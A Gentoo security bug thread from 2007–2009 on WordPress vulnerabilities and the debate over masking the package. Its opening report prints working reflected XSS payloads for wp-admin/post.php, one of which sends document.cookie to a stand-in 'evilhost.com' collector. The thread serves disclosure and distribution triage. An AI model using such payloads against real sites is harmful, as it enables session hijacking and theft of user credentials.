Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!

Bug 168529

Summary: www-apps/wordpress security status
Product: Gentoo Security Reporter: Executioner <keith>
Component: VulnerabilitiesAssignee: Gentoo Security <security>
Status: RESOLVED FIXED    
Severity: enhancement CC: bernd, ferringb, gongloo, gurligebis, hans, jesse, jesus.de.santos, karim, kevin.bowling, mehmet, mgorny, mian.hasan.khalil, moixa, r0bertz, sgtphou, transacid, ulmer, web-apps
Priority: High    
Version: unspecified   
Hardware: All   
OS: Linux   
URL: http://www.securityfocus.com/archive/1/461351
Whiteboard: B4 [maskglsa]
Package list:
Runtime testing required: ---
Bug Depends on:    
Bug Blocks: 199833, 211166    

Description Executioner 2007-02-27 07:02:34 UTC
Exploit:

Cookie in an Alert Box:
<iframe width=600 height=400
src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Csc
ript%3Ealert(document.cookie)%3C/script%3E%3Clol=%27'></iframe>

Cookie send to an Evil Host:
<iframe width=600 height=400
src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Csc
ript%3Eimage=document.createElement(%27img%27);image.src=%27http://evilh
ost.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol
=%27'></iframe>

Reproducible: Didn't try




http://www.securityfocus.com/archive/1/461351
Comment 1 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2007-03-01 14:31:19 UTC
the ~arched tree is still vulnerable, please mask the vulnerable ebuild or ~keyword 2.1.1. (Or, both)


Should we issue a GLSA?

Personnally i tend to think we should issue a GLSA warning our users that wordpress is no longer security-supported (either it's put in p.mask or in ~arch)
Comment 2 Stefan Cornelius (RETIRED) gentoo-dev 2007-03-01 14:51:14 UTC
i'm pro-mask. i simply can't recommend anyone to use this app - if users want it, then they still can unmask...
Comment 3 Jesus de Santos Garcia 2007-03-03 01:32:34 UTC
Bad days for wordpress. Now, and exploit that was added by a cracker.

http://wordpress.org/development/2007/03/upgrade-212/

Does this affect gentoo?
Comment 4 Jakub Moc (RETIRED) gentoo-dev 2007-03-03 09:49:23 UTC
(In reply to comment #3)
> Bad days for wordpress. Now, and exploit that was added by a cracker.
> http://wordpress.org/development/2007/03/upgrade-212/
> Does this affect gentoo?

We've already noticed. Pretty much hard to say, noone upstream bothered to provide the hashes of 'geniune' vs. 'cracked' files. This thing needs to be completely masked and possible just removed from portage; upstream can't be much more lame than this. :X
Comment 5 Matthias Geerdsen (RETIRED) gentoo-dev 2007-03-06 14:26:58 UTC
just found this by coincidence...

# Stefan Cornelius <dercorny@gentoo.org> (3 Mar 2007)
# Masking wordpress due to a long list of security bugs
# e.g. check bug #168529
www-apps/wordpress


since it seems to be masked now... do we want a mask glsa?
Comment 6 Matthew Dirks 2007-03-06 19:46:26 UTC
Does this really need to be hard-masked? A major XSS vunerability (at least the
other one reported in bug #168449) is reportedly fixed now in 2.1.2. Also only
the 2.1.1 package was tampered with and even that was only vulnerable from
between 2007-02-25 and 2007-03-02. Version 2.1.2 has replaced 2.1.1 due to the
tampering.

Also, I'm sure Wordpress could provide some digests of their "genuine" archive
files if asked to guard from future tampering.

At the least maybe arch-mask this across the board instead of hard-mask it
since the security issues are *well* documented in other locations as well.
Comment 7 Matt Drew (RETIRED) gentoo-dev 2007-03-07 17:56:35 UTC
some additional, related vulnerabilities:

http://www.fadetoblack.ch/advisories/wordpress_2.1.1_multiple_script_injection_vulnerabilities.txt

I'll vote for a GLSA - people need to know that Wordpress is no longer going to be supported, it's a popular webapp.
Comment 8 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2007-03-09 22:35:24 UTC
(In reply to comment #7)
> some additional, related vulnerabilities:
> 
> http://www.fadetoblack.ch/advisories/wordpress_2.1.1_multiple_script_injection_vulnerabilities.txt
> 
> I'll vote for a GLSA - people need to know that Wordpress is no longer going to
> be supported, it's a popular webapp.
> 


i agree. Furthermore, there have been other security issues in the meantime.


GLSA request filed
Comment 9 Matthew Dirks 2007-03-13 16:52:41 UTC
It should be noted that this vulnerability was filed within the date range that the tampered 2.1.1 file was available (2007-2-25 to 2007-3-2). 

If this is still the case in 2.1.2, then that's fine. Otherwise this shouldn't be grounds for masking 2.1.2 as well. 

Technically you could probably just outright remove 2.1.1 from the portage tree since it no longer exists as far as a version you can download from the wordpress.org site.

As far as 2.1.2 I still think arch mask is more fitting from a user's perspective. Hard mask to me implies either a development version or outright "unstable" behavior. For example, Joe user tries to use a common feature in an everyday kind of way (i.e. not injecting various SQL statements in odd places) and the software breaks something or outright crashes. This seems to be reinforced by the Gentoo Development Guide (http://devmanual.gentoo.org/keywording/):

"The package.mask file can be used to 'hard mask' individual or groups of ebuilds. This should be used for testing ebuilds or beta releases of software, and may also be used if a package has serious compatibility problems. Packages which are not hard masked must not have a dependency upon hard masked packages.

The only time it is acceptable for a user to see the Possibly a DEPEND problem error message is if they have manually changed visibility levels for a package (for example, through /etc/portage/) and have missed a dependency. You should never commit a change which could cause this error to appear on a user system."


 ... This is not so much "unstable" as it is "security flawed" and finding such flaws is more indicative of simple arch mask ... not a hard mask as the Development Guide would seem to dictate. 

Either way a GLSA is a good step, I have no issue there. My only issue is with the level of masking on the 2.1.2 version.
Comment 10 Matthew Dirks 2007-03-13 17:00:47 UTC
Oops. 2.1.1 is already removed. You can disregard that part of my post.
Comment 11 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2007-03-14 00:27:08 UTC
(In reply to comment #6)
> Does this really need to be hard-masked? A major XSS vunerability (at least the
> other one reported in bug #168449) is reportedly fixed now in 2.1.2. Also only
> the 2.1.1 package was tampered with and even that was only vulnerable from
> between 2007-02-25 and 2007-03-02. Version 2.1.2 has replaced 2.1.1 due to the
> tampering.
> 


i really don't know why does all that people discovered so many vulnerabilities in wordpress during those last few weeks, see:
http://secunia.com/search/?search=wordpress
and 
http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress
That's impressive.

Wordpress definitely can't be considered as a stable package (arched) nor as a for-stable-testing package (~arched)
Comment 12 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2007-03-14 00:27:35 UTC
*** Bug 168449 has been marked as a duplicate of this bug. ***
Comment 13 Matthew Dirks 2007-03-15 15:37:43 UTC
(In reply to comment #11)
> (In reply to comment #6)
> > Does this really need to be hard-masked? A major XSS vunerability (at least the
> > other one reported in bug #168449) is reportedly fixed now in 2.1.2. Also only
> > the 2.1.1 package was tampered with and even that was only vulnerable from
> > between 2007-02-25 and 2007-03-02. Version 2.1.2 has replaced 2.1.1 due to the
> > tampering.
> > 
> 
> 
> i really don't know why does all that people discovered so many vulnerabilities
> in wordpress during those last few weeks, see:
> http://secunia.com/search/?search=wordpress
> and 
> http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress
> That's impressive.
> 
> Wordpress definitely can't be considered as a stable package (arched) nor as a
> for-stable-testing package (~arched)
> 

You can't just look at the number of results just by searching "wordpress", say "Wow, that's a lot. This product must be really unstable", and leave it at that. Many of the vulnerabilities listed are for *much older versions* (i.e. previous to even 2.0). In at least one case on cve.mitre.org, there was a vulnerability that didn't have anything to do with Wordpress itself and yet it showed up in the search because it's just a simple partial text search (for example: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0574 ). Two of the CVE vulnerabilities cite the same sources and are really two symptoms of the same vulnerability  ( http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0540 and  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0541 ) and even those are more a problem with the 3rd party pingback function that wordpresss uses rather than wordpress itself (they had a couple issues with their implementation of it on top of the vulnerability but that has been fixed since version 2.1).

After looking though any listings that remotely appeared to possibly affect the current version (I think 2.0.9 could probably be dumped from the portage tree at this point) I've come cut the list down to 3 "internal" vulnerabilities and one "external" vulnerability (i.e. the previously mentioned "pingback" vunerability URLs) and even some of the internal vulnerabilities can be corrected by blocking the direct access of certain files through .htaccess.

URLs for "current" vulnerabilities:
http://secunia.com/advisories/24316/
http://secunia.com/advisories/24430/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1409


There was also one other "unfixed" vulnerability listed, but it's a pretty trivial one that's only valid for manual brute-force type attacks. It concerns differing error messages for bad user names and bad passwords. It may have been fixed by now (it was reported on version 2.0.5) 
URL: http://secunia.com/advisories/23621/

Comment 14 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2007-03-15 21:52:32 UTC
too long for my tired eyes, sorry. Perhaps the maintainer will choose to put back it into ~arch lated, we'll see.
Comment 15 Steve Dibb (RETIRED) gentoo-dev 2007-03-16 23:00:17 UTC
(In reply to comment #14)
> too long for my tired eyes, sorry. Perhaps the maintainer will choose to put
> back it into ~arch lated, we'll see.
> 

Can we please close the security bugs now that it's hard masked?

I'm not going to kill the 2.0.x branch since upstream is backporting security patches to it.

And I'm not going to unmask it anytime soon since 2.0.5 through 2.0.9 were all security bugfix releases coming out on average two weeks apart each.
Comment 16 Stephen Ulmer 2007-03-17 16:09:26 UTC
The hard mask is:

  www-apps/wordpress

it seems to me that it should have been

  <www-apps/wordpress-2.1.2

Wordpress is, in general, a good product with an extremely active user community and good upstream maintenance.  Additionally, the security problem with 2.1.1 wasn't with Wordpress itself, but the site from which wordpress is distributed. Wordpress is certainly not "unstable".

Hard masking all of Wordpress does not seem like a response measured against the actual risk. Please consider changing the mask as above.

Thank you.
Comment 17 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2007-03-25 07:33:54 UTC
GLSA 200703-23

Moving to enhancement pending resolution.

Steve please comment here if you unmask or remove future versions.
Comment 18 Jesus de Santos Garcia 2007-04-03 13:42:35 UTC
http://wordpress.org/development/2007/04/wordpress-213-and-2010/

Wordpress 2.1.3 and 2.0.10

We have a security update release now available for both the 2.1 and 2.0 branches of WordPress now available for immediate download. This update is highly recommend for all users of both branches.

----------


Lof of people is using wordpress. We should at least update de ebuild although it is being marked as masked.

Comment 19 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2007-04-03 14:49:20 UTC
web-apps what do you say?
Comment 20 Hans Rakers 2007-04-09 18:22:52 UTC
For people that don't want to/can't wait much longer, copying the ebuild for 2.1.2 in an overlay and renaming it to wordpress-2.1.3.ebuild works just fine.
Comment 21 Steve Dibb (RETIRED) gentoo-dev 2007-04-10 13:17:12 UTC
(In reply to comment #18)
> http://wordpress.org/development/2007/04/wordpress-213-and-2010/
> 
> Wordpress 2.1.3 and 2.0.10
> 
> We have a security update release now available for both the 2.1 and 2.0
> branches of WordPress now available for immediate download. This update is
> highly recommend for all users of both branches.

New ebuilds in CVS
Comment 22 Rescue9 2007-04-21 23:00:19 UTC
(In reply to comment #21)
> New ebuilds in CVS

Does this mean it's going to be unmasked?

Comment 23 Steve Dibb (RETIRED) gentoo-dev 2007-04-23 23:03:00 UTC
(In reply to comment #22)
> (In reply to comment #21)
> > New ebuilds in CVS
> 
> Does this mean it's going to be unmasked?
> 

No.

Can we close the bug?
Comment 24 Matthew Dirks 2007-04-24 12:43:44 UTC
(In reply to comment #23)
> (In reply to comment #22)
> > (In reply to comment #21)
> > > New ebuilds in CVS
> > 
> > Does this mean it's going to be unmasked?
> > 
> 
> No.
> 
> Can we close the bug?
> 

If you're wanting to close the bug, then why not unmask it??? I mean what's the sense of keeping it masked if 2.1.3 and 2.0.10 are supposed to fix all the XSS issues?
Comment 25 Steve Dibb (RETIRED) gentoo-dev 2007-04-26 19:32:01 UTC
(In reply to comment #24)
> (In reply to comment #23)
> > (In reply to comment #22)
> > > (In reply to comment #21)
> > > > New ebuilds in CVS
> > > 
> > > Does this mean it's going to be unmasked?
> > > 
> > 
> > No.
> > 
> > Can we close the bug?
> > 
> 
> If you're wanting to close the bug, then why not unmask it??? I mean what's the
> sense of keeping it masked if 2.1.3 and 2.0.10 are supposed to fix all the XSS
> issues?
> 

Sorry, I like wordpress as much as the next guy, but it has had a poor security track recently, which led us to p.mask it in the first place.

If things improve in the future, we'll look at it again, but now's not the time.
Comment 26 Matthew Dirks 2007-04-26 21:18:09 UTC
(In reply to comment #25)
> (In reply to comment #24)
> > (In reply to comment #23)
> > > (In reply to comment #22)
> > > > (In reply to comment #21)
> > > > > New ebuilds in CVS
> > > > 
> > > > Does this mean it's going to be unmasked?
> > > > 
> > > 
> > > No.
> > > 
> > > Can we close the bug?
> > > 
> > 
> > If you're wanting to close the bug, then why not unmask it??? I mean what's the
> > sense of keeping it masked if 2.1.3 and 2.0.10 are supposed to fix all the XSS
> > issues?
> > 
> 
> Sorry, I like wordpress as much as the next guy, but it has had a poor security
> track recently, which led us to p.mask it in the first place.
> 
> If things improve in the future, we'll look at it again, but now's not the
> time.
> 

I guess it make some sense when you put it that way. As long as there's fair chance for the software to "redeem" itself, then I guess there's not as much of a problem. I'll just have to keep my "www-apps/wordpress" entry in package.unmask for a little while longer :-). I'm just hoping the hard mask doesn't "scare off" some people as much as ... say ... an alpha release of most any Microsoft product ( or beta ...  or perhaps even "stable" depending on your point of view )
Comment 27 FieldySnuts 2007-04-26 21:30:13 UTC
I know this just creates what I'm actually asking to stop... Can we have this be a bug, and not a forum? Thank you :)
Comment 28 Eric Herot 2007-07-10 21:48:22 UTC
Two weeks ago WordPress released a major security update in 2.2.1.  Any chance of changing the hard/whole package mask to a "<www-apps/wordpress-2.2.1" mask?

See: http://wordpress.org/support/topic/122939
Comment 29 Jesus de Santos Garcia 2007-07-11 13:31:24 UTC
(In reply to comment #28)
> Two weeks ago WordPress released a major security update in 2.2.1.  Any chance
> of changing the hard/whole package mask to a "<www-apps/wordpress-2.2.1" mask?
> 
> See: http://wordpress.org/support/topic/122939
> 

My vote for it

Comment 30 Tobias Scherbaum (RETIRED) gentoo-dev 2007-07-11 17:27:43 UTC
(In reply to comment #28)
> Two weeks ago WordPress released a major security update in 2.2.1.  Any chance
> of changing the hard/whole package mask to a "<www-apps/wordpress-2.2.1" mask?
> 
> See: http://wordpress.org/support/topic/122939
> 

As long as every little new Wordpress release contains security-relevant fixes I'd say: no.
Comment 31 Hans Rakers 2007-08-08 08:28:20 UTC
And its that time of the month again :P

http://wordpress.org/development/2007/08/wordpress-222-and-2011/

New release including 2 security related fixed (XSS and SQL injection).
Comment 32 Tobias Scherbaum (RETIRED) gentoo-dev 2007-08-08 08:45:22 UTC
(In reply to comment #31)
> And its that time of the month again :P
> 
> http://wordpress.org/development/2007/08/wordpress-222-and-2011/
> 
> New release including 2 security related fixed (XSS and SQL injection).
> 

... and as usual just copying the ebuild works fine.
Comment 33 Steve Dibb (RETIRED) gentoo-dev 2007-08-11 22:16:53 UTC
(In reply to comment #32)
> (In reply to comment #31)
> > And its that time of the month again :P
> > 
> > http://wordpress.org/development/2007/08/wordpress-222-and-2011/
> > 
> > New release including 2 security related fixed (XSS and SQL injection).
> > 
> 
> ... and as usual just copying the ebuild works fine.
> 

thanks, bumped

Comment 34 Gunnar Wrobel (RETIRED) gentoo-dev 2007-10-30 12:19:04 UTC
Can this bug be closed? If not and it should be kept open as a reference that removal of the hard mask of wordpress might be just temporary then I suggest to modify the topic so that this becomes clear.
Comment 35 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2007-10-30 14:11:48 UTC
This bug should stay open until the mask is removed and we'd likely need to issue a new GLSA at that point.

wrobel feel free to change the title if you have one that suits better, I need more coffee here:)
Comment 36 Robert Buchholz (RETIRED) gentoo-dev 2007-10-30 16:21:39 UTC
(In reply to comment #35)
> This bug should stay open until the mask is removed and we'd likely need to
> issue a new GLSA at that point.
> 
> wrobel feel free to change the title if you have one that suits better, I need
> more coffee here:)

The p.mask is removed for >=2.3, but those are not stable.
Comment 37 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2007-10-30 18:26:36 UTC
Hmmm I guess we'll have to wait until it is stable again (if ever).
Comment 38 Gunnar Wrobel (RETIRED) gentoo-dev 2008-02-05 12:13:33 UTC
In the light of #208980 and the fact that this app had a number of sec issues during the months it has been unmasked the question has come up whether we completely move this app into the webapp-experimental overlay.

I don't mind bumping wordpress once in a while but I also don't feel it is too good if we tell our users that this is a usable app.

How does security feel about wordpress?
Comment 39 Pierre-Yves Rofes (RETIRED) gentoo-dev 2008-02-05 12:40:39 UTC
(In reply to comment #38)
> In the light of #208980 and the fact that this app had a number of sec issues
> during the months it has been unmasked the question has come up whether we
> completely move this app into the webapp-experimental overlay.
> 
> I don't mind bumping wordpress once in a while but I also don't feel it is too
> good if we tell our users that this is a usable app.
> 
> How does security feel about wordpress?
> 

Like you said, new worpress vulns pop up every month, so IMO it should stay p.masked. The webapp-experimental sounds like a plan.
Comment 40 Robert Buchholz (RETIRED) gentoo-dev 2008-02-11 23:00:17 UTC
I don't think it needs to move to an experimental overlay, if it is p.masked.
Comment 41 Gunnar Wrobel (RETIRED) gentoo-dev 2008-02-15 09:43:58 UTC
Okay, hard mask applied again.
Comment 42 Karim 2008-04-04 08:08:04 UTC
Wordpress 2.5 has been released. http://wordpress.org/latest.tar.gz
Would appreciate to see it included in portage tree.
Thanks!
Comment 43 Gunnar Wrobel (RETIRED) gentoo-dev 2008-04-27 06:03:43 UTC
(In reply to comment #42)
> Wordpress 2.5 has been released. http://wordpress.org/latest.tar.gz
> Would appreciate to see it included in portage tree.
> Thanks!
> 

2.5.1. in the tree
Comment 44 Robert Buchholz (RETIRED) gentoo-dev 2008-05-02 09:52:30 UTC
*** Bug 219912 has been marked as a duplicate of this bug. ***
Comment 45 Zhang Le (RETIRED) gentoo-dev 2008-05-27 19:43:31 UTC
Is there any other open vulnerabilities?
If not, shall we unmask it?
Thanks!
Comment 46 Bjarke Istrup Pedersen (RETIRED) gentoo-dev 2008-07-22 14:59:45 UTC
2.6 has been released, whats the status of that one?
Comment 47 Gunnar Wrobel (RETIRED) gentoo-dev 2008-08-01 17:24:56 UTC
Added wordpress-2.6. Let's see how this one fares during the next months but I don't really expect less sec bugs.
Comment 48 Hasan Khalil 2008-08-21 21:32:50 UTC
2.6.1 is out, would love to see it added to the tree.
Comment 49 Robert Buchholz (RETIRED) gentoo-dev 2008-09-09 14:46:37 UTC
2.6.2 is out, fixing a SQL column trunctation issue that allows for user password reset.
Comment 50 Stefan Behte (RETIRED) gentoo-dev Security 2008-11-18 18:58:32 UTC
Another one: #247468 :/
Comment 51 Stefan Behte (RETIRED) gentoo-dev Security 2008-11-29 10:54:24 UTC
Another one: CVE-2008-5278
Luckily, we've only got 2.6.5 in tree.
Comment 52 Kevin Bowling 2008-12-12 05:11:43 UTC
How about Wordpress 2.7?  Hopefully it will have a better security record :D.
Comment 53 Peter Volkov (RETIRED) gentoo-dev 2008-12-26 07:41:34 UTC
Probably wordpress improved these days and upstream is working on bugs. What about unmasking it? I'm going to do this if nobody objects.
Comment 54 Stefan Behte (RETIRED) gentoo-dev Security 2008-12-26 09:43:16 UTC
Also CVE-2008-5695.
I'm against stabilizing it, as wordpress has as too long security record for my taste. If there are no bugs for three months I might change my mind, though.
Comment 55 Tobias Scherbaum (RETIRED) gentoo-dev 2008-12-26 09:56:11 UTC
(In reply to comment #54)
> Also CVE-2008-5695.
> I'm against stabilizing it, as wordpress has as too long security record for my
> taste. If there are no bugs for three months I might change my mind, though.
> 

There's a difference between unmasking it (like Peter suggested) and stabilizing Wordpress. 
Comment 56 Kevin Bowling 2008-12-26 11:56:47 UTC
3 _months_ for a php app?  Not going to happen :).  I agree that it should be unmasked.  There is probably no reason to stabilize a package like this because changes will be so frequent, however, unless the policy were to be different (i.e. minor releases pushed stable immediately).

FWIW in recent times it has been no worse than Drupal or Mediawiki.
Comment 57 Stefan Behte (RETIRED) gentoo-dev Security 2008-12-26 14:28:24 UTC
Uuuh, why did I read stabilize there?
Unmasking might be ok, but I'm against stabling.
Comment 58 Tobias Heinlein (RETIRED) gentoo-dev 2008-12-26 15:44:40 UTC
(In reply to comment #57)
> Uuuh, why did I read stabilize there?
> Unmasking might be ok, but I'm against stabling.
> 

I agree.
Comment 59 Peter Volkov (RETIRED) gentoo-dev 2008-12-30 14:55:25 UTC
unmasked. Let's close this bug, noglsa since wordpress is now unstable package.
Comment 60 Pierre-Yves Rofes (RETIRED) gentoo-dev 2009-01-11 19:17:42 UTC
ok, closing since it's now unmasked. We'll open new bugs as new issues pop up.